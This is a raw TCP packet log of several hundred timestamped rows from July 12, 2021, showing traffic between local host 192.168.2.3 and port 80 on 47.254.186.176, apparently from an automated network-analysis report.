Jul 12, 2021 10:28:46.404228926 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.404236078 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.404259920 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.404274940 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.404289961 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.404311895 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.404331923 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.404340982 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.404378891 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.404676914 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.404702902 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.404728889 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.404747009 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.404763937 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.404788971 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.404808998 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.404823065 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.404865980 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.405026913 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.405188084 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.405211926 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.405239105 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.405452013 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.405483007 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.405497074 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.405524015 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.405575991 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.405610085 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.405635118 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.405675888 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.405721903 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.405811071 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.405833006 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.405860901 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.405888081 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.405910015 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.405930042 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.405939102 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.405963898 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.405977011 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.405997992 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.406019926 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.406064987 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.406088114 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.406131983 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.406227112 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.406250954 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.406272888 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.406295061 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.406353951 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.406393051 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.406408072 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.406558990 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.406588078 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.406610012 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.406624079 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.406646967 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.406668901 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.406681061 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.406703949 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.406727076 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.406738997 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.406757116 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.406774044 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.406786919 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.406807899 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.406827927 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.406837940 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.406861067 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.406872034 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.406896114 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.406917095 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.406939030 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.406945944 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.406965017 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.406987906 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.406994104 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.407016993 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.407040119 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.407047033 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.407093048 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.407304049 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.407326937 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.407375097 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.407402992 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.407603025 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.407628059 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.407645941 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.407663107 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.407682896 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.407705069 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.407711029 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.407732010 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.407747030 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.407767057 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.407789946 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.407814026 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.407825947 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.407847881 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.407876968 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.407917976 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.407939911 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.407955885 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.407974005 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.407999039 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.408019066 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.408035040 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.408060074 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.408082008 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.408091068 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.408112049 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.408122063 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.408143044 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.408163071 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.408185959 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.408200026 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.408241034 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.408612967 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.408643007 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.408668041 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.408689976 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.408701897 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.408726931 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.408740044 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.408760071 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.408796072 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.409032106 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.409059048 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.409082890 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.409109116 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.409125090 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.409152031 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.409173965 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.409190893 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.409215927 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.409236908 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.409251928 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.409274101 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.409293890 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.409303904 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.409328938 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.409348965 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.409359932 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.409380913 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.409403086 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.409410954 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.409434080 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.409456015 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.409471035 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.409495115 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.409517050 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.409527063 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.409548998 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.409591913 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.409813881 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.409876108 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.409910917 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.409936905 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.410006046 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.410013914 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.410039902 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.410119057 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.410149097 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.410171032 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.410212994 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.410295963 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.410320044 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.410341024 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.410362959 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.410388947 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.410397053 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.410429001 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.410435915 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.410464048 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.410496950 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.410512924 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.410540104 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.410564899 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.410577059 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.410603046 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.410623074 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.410641909 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.410670042 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.410693884 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.410706997 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.410732985 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.410761118 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.410773039 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.410795927 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.410969973 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.410980940 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.411005974 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.411027908 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.411039114 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.411062002 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.411084890 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.411092997 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.411233902 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.411416054 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.411451101 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.411475897 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.411493063 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.411506891 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.411526918 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.411550045 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.411556959 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.411578894 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.411592007 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.411617041 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.411638975 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.411669970 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.411680937 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.411705017 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.411725998 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.411745071 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.411755085 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.411778927 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.411787987 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.411817074 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.411838055 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.411845922 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.411869049 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.411896944 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.411904097 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.411928892 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.411942959 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.412250996 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.412312984 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.412369013 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.412394047 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.412416935 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.412436962 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.412448883 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.412506104 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.412559986 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.412583113 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.412606001 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.412627935 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.412638903 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.412658930 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.412683010 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.412694931 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.412727118 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.412765026 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.412785053 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.412806034 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.412828922 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.412837029 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.412889957 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.412899017 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.412924051 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.412945032 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.412966013 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.412976027 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.412997007 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.413021088 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.413027048 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.413048029 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.413069010 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.413083076 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.413105011 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.413132906 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.413201094 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.413250923 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.413747072 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.413772106 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.413791895 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.413815022 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.413827896 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.413850069 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.413871050 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.413880110 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.413919926 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.413944006 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.413965940 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.413988113 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.414011002 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.414021969 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.414041996 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.414056063 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.414069891 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.414091110 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.414110899 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.414120913 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.414144039 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.414170027 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.414175987 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.414201021 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.414213896 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.414232969 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.414252043 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.414272070 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.414282084 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.414304972 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.414320946 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.414338112 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.414361954 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.414385080 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.414413929 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.414444923 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.415100098 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.415144920 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.415168047 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.415194988 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.415208101 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.415231943 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.415260077 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.415285110 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.415333033 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.415364027 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.415390968 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.415410995 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.415446997 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.415476084 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.415513992 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.415527105 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.415551901 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.415605068 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.415631056 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.415652990 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.415680885 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.415703058 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.415714979 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.415741920 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.415766954 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.415790081 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.415802002 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.415816069 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.415834904 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.415860891 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.415888071 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.415894032 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.415916920 CEST	80	49720	47.254.186.176	192.168.2.3
